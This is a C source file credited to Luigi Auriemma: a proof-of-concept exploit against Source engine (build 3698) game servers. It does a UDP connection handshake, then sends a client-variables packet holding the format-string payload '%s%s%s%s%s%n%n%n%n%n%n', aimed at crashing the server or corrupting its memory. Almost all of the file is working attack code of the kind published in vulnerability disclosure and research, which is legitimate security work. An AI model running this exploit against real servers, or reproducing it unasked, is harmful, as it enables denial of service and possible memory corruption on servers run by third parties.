/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "rwbits.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp
#endif



#define VER         "0.1"
#define PORT        27015
#define BUFFSZ      0xffff
#define STEAMKEYSZ  632     // 632  (max 2048)
#define COOKIESZ    32      // 32  (max 2048)
#define PADDING(X)  ((X + 7) & (~7))

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



int write_bstr(u8 *data, int b, u8 *str, int len);
int putrr(u8 *data, int len, int sx);
int putcc(u8 *data, int chr, int len);
int putmm(u8 *data, u8 *str, int len);
int putsl(u8 *data, u8 *str);
int putxx(u8 *data, u32 num, int bits);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



typedef struct {
    u8      *name;
    u8      *value;
} cl_vars_t;

cl_vars_t   cl_vars[] = {
    { "cl_interp_npcs",     "0" },
    { "cl_interpolate",     "1" },
    { "cl_predict",         "1" },
    { "cl_interp_ratio",    "2" },
    { "cl_team",            "default" },
    { "cl_class",           "default" },
    { "english",            "1" },
    { "cl_predictweapons",  "1" },
    { "cl_lagcompensation", "1" },
    //{ "cl_autobuy",         "m4a1 ak47 famas galil p90 mp5 primammo secammo defuser vesthelm vest" },
    //{ "cl_rebuy",           "PrimaryWeapon PrimaryAmmo Defuser Armor HEGrenade Flashbang SmokeGrenade SecondaryWeapon SecondaryAmmo NightVision" },
    { "cl_autowepswitch",   "1" },
    { "cl_autohelp",        "1" },
    { "cl_spec_mode",       "5" },
    { "voice_loopback",     "0" },
    { "cl_interp",          "0.02" },
    { "closecaption",       "0" },
    { "cl_language",        "english" },
    { "tv_nochat",          "0" },
    { "cl_updaterate",      "100" },
    { "cl_cmdrate",         "100" },
    { "rate",               "20000" },
    { "name",               "unnamed" },
    { NULL,                 NULL }
};



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u32     chall;
    int     sd,
            len,
            b,
            i,
            t,
            cl_varn;
    u16     port    = PORT;
    u8      nickname[16],
            tmp[STEAMKEYSZ + COOKIESZ],
            *buff,
            *host;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Source engine (build 3698) format string (LAN test) "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]>\n"
            "\n"
            "this proof-of-concept works only with LAN servers\n"
            "\n", argv[0], port);
        exit(1);
    }

    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    //for(;;) {
        putrr(nickname, sizeof(nickname) - 1, 1);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        b = 0;
        b = write_bits(-1,      32, buff, b);
        b = write_bits(0x71,    8,  buff, b);
        b = write_bstr(buff, b, "00000000000000", -1);
        len = PADDING(b) >> 3;
        len = send_recv(sd, buff, len, buff, BUFFSZ, &peer, 1);

        if(buff[4] != 0x41) {
            printf("\nError: packet not accepted (%02x)\n", buff[4]);
            if(buff[4] == 0x39) printf("       %s\n", buff + 5);
            exit(1);
        }
        chall = buff[5] | (buff[6] << 8) | (buff[7] << 16) | (buff[8] << 24);

        b = 0;
        b = write_bits(-1,      32, buff, b);
        b = write_bits(0x6b,    8,  buff, b);
        b = write_bits(7,       32, buff, b);       // protocol
        b = write_bits(3,       32, buff, b);
        b = write_bits(chall,   32, buff, b);       // challenge
        b = write_bstr(buff, b, nickname, -1);      // nickname
        b = write_bstr(buff, b, "", -1);            // certificate?
        b = write_bits(STEAMKEYSZ, 16, buff, b);    // steam key
        putrr(tmp, STEAMKEYSZ, 0);
        b = write_bstr(buff, b, tmp, STEAMKEYSZ);
        b = write_bits(COOKIESZ,16, buff, b);       // cookie
        putrr(tmp, COOKIESZ, 0);
        b = write_bstr(buff, b, tmp, COOKIESZ);
        len = PADDING(b) >> 3;
        len = send_recv(sd, buff, len, buff, BUFFSZ, &peer, 1);

        if(buff[4] != 0x42) {
            printf("\nError: packet not accepted (%02x)\n", buff[4]);
            if(buff[4] == 0x39) printf("       %s\n", buff + 5);
            exit(1);
        }

        for(i = 0; cl_vars[i].name; i++);
        cl_varn = i;

        b = 0;
        b = write_bits(1,       32,   buff, b); // packet number
        b = write_bits(0,       32,   buff, b);
        b = write_bits(1,       8,    buff, b);
        b = write_bits(0,       8,    buff, b);
        b = write_bits(0,       3,    buff, b);
        b = write_bits(1,       1,    buff, b);
        b = write_bits(0,       1,    buff, b);
        b = write_bits(0,       1,    buff, b);
        t = b;
        b = write_bits(0,       17,   buff, b);
        b = write_bits(5,       5,    buff, b); // ???
        b = write_bits(cl_varn, 8,    buff, b);
        for(i = 0; i < cl_varn; i++) {
            b = write_bstr(buff, b, cl_vars[i].name, -1);
            b = write_bstr(buff, b, cl_vars[i].value, -1);
        }
        b = write_bits(1,       5,    buff, b);
        b = write_bstr(buff, b, "%s%s%s%s%s%n%n%n%n%n%n", -1);
        len = PADDING(b) >> 3;
        write_bits(len - 13,    17,   buff, t);
        len = send_recv(sd, buff, len, buff, BUFFSZ, &peer, 0);
        if(len >= 0) {
            for(i = 0; i < 16; i++) {
                len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 0);
                if(len < 0) break;
            }
        }

        close(sd);
    //}

    printf("\n- check the server manually for verifying if it's vulnerable or not\n");
    free(buff);
    return(0);
}



int write_bstr(u8 *data, int b, u8 *str, int len) {
    int     i;

    if(len < 0) len = strlen(str) + 1;
    for(i = 0; i < len; i++) {
        b = write_bits(str[i], 8, data, b); // 7?
    }
    return(b);
}



int putrr(u8 *data, int len, int sx) {
    static const char table[] =
            "0123456789"
            "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
            "abcdefghijklmnopqrstuvwxyz";
    static u32      rnd = 0;
    int     i;

    if(!rnd) rnd = ~time(NULL);

    if(sx) {
        len = rnd % len;
        if(len < 3) len = 3;
    }

    for(i = 0; i < len; i++) {
        rnd = ((rnd * 0x343FD) + 0x269EC3) >> 1;
        if(sx) {
            data[i] = table[rnd % (sizeof(table) - 1)];
        } else {
            data[i] = rnd;
        }
    }
    if(sx) data[i] = 0;
    return(len);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int putmm(u8 *data, u8 *str, int len) {
    memcpy(data, str, len);
    return(len);
}



int putsl(u8 *data, u8 *str) {
    int     len;

    len = strlen(str) + 1;
    memcpy(data, str, len);
    return(len);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3));
    }
    return(bytes);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        fputc('.', stdout);
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


